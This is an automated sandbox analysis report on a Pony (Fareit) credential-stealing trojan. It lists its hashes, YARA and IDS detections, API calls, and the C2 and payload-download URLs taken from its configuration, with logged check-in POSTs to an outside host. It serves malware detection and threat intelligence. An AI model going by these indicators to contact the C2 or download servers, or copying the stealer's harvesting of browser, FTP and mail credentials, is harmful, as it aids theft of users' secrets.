Windows Analysis Report
a5gvJhukP7.exe

Overview

General Information

Sample name: a5gvJhukP7.exe
renamed because original name is a hash value
Original sample name: 18579d8151a242cf2e9b69b016479481.exe
Analysis ID: 1528458
MD5: 18579d8151a242cf2e9b69b016479481
SHA1: 051bd937961bad91c2a3074eb39c001e591758d6
SHA256: 2371d8edbb2a1245b01cc06a870ddca49acb3be47b25e0fddc5d1b0032780bdf
Tags: exePonyuser-abuse_ch
Infos:

Detection

Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Pony
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
PE file has a writeable .text section
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (RtlQueryProcessDebugInformation/HeapInformation)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
EvilPony, Ponyshe Privately modded version of the Pony stealer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: a5gvJhukP7.exe Avira: detected
Found malware configuration
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack Malware Configuration Extractor: Pony {"C2 list": ["http://209.59.219.70/forum/viewtopic.php", "http://67.215.225.205:8080/forum/viewtopic.php", "http://tokulances.sitebr.net/jV1.exe", "http://ftp.approachit.com/jZy.exe", "http://atualizacoes.issqn.net/FhPD.exe"]}
Multi AV Scanner detection for submitted file
Source: a5gvJhukP7.exe ReversingLabs: Detection: 89%
Yara detected Pony
Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: a5gvJhukP7.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A54C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree, 1_2_0040A54C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore, 1_2_0040D1E9
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040CC68 lstrlenA,CryptUnprotectData,LocalFree, 1_2_0040CC68
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A94F lstrlenA,CryptUnprotectData,LocalFree, 1_2_0040A94F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040BA61 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA, 1_2_0040BA61
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040421D CryptUnprotectData,LocalFree, 1_2_0040421D
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A391 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree, 1_2_0040A391
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A798 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree, 1_2_0040A798
Uses 32bit PE files
Source: a5gvJhukP7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: a5gvJhukP7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00405024
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_00404CB4
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_0040891F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_00403FE7
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_0040966C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_0040879B
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:50007 -> 67.215.225.205:8080
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://209.59.219.70/forum/viewtopic.php
Source: Malware configuration extractor URLs: http://67.215.225.205:8080/forum/viewtopic.php
Source: Malware configuration extractor URLs: http://tokulances.sitebr.net/jV1.exe
Source: Malware configuration extractor URLs: http://ftp.approachit.com/jZy.exe
Source: Malware configuration extractor URLs: http://atualizacoes.issqn.net/FhPD.exe
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 67.215.225.205:8080
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00403771 recv, 1_2_00403771
Source: unknown HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://209.59.219.70/forum/viewtopic.php
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.php
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.phpcv
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.phphttp://209.59.219.70/forum/viewtopic.phphttp://ftp.app
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://atualizacoes.issqn.net/FhPD.exe
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://ftp.approachit.com/jZy.exe
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tokulances.sitebr.net/jV1.exe
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud
barindex
Yara detected Pony
Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
PE file has a writeable .text section
Source: a5gvJhukP7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Detected potential crypto function
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1E10 0_2_00BA1E10
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA2110 0_2_00BA2110
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1300 0_2_00BA1300
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00402D3E 1_2_00402D3E
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00411EE9 1_2_00411EE9
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA2110 1_2_00BA2110
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA1E10 1_2_00BA1E10
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA1300 1_2_00BA1300
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: String function: 00410514 appears 40 times
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: String function: 00404192 appears 50 times
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: String function: 00401BB8 appears 139 times
Sample file is different than original file name gathered from version info
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000000.00000000.1658498912.0000000000BAB000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe Binary or memory string: OriginalFilename vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000001.00000000.1704943301.0000000000BAB000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Uses 32bit PE files
Source: a5gvJhukP7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
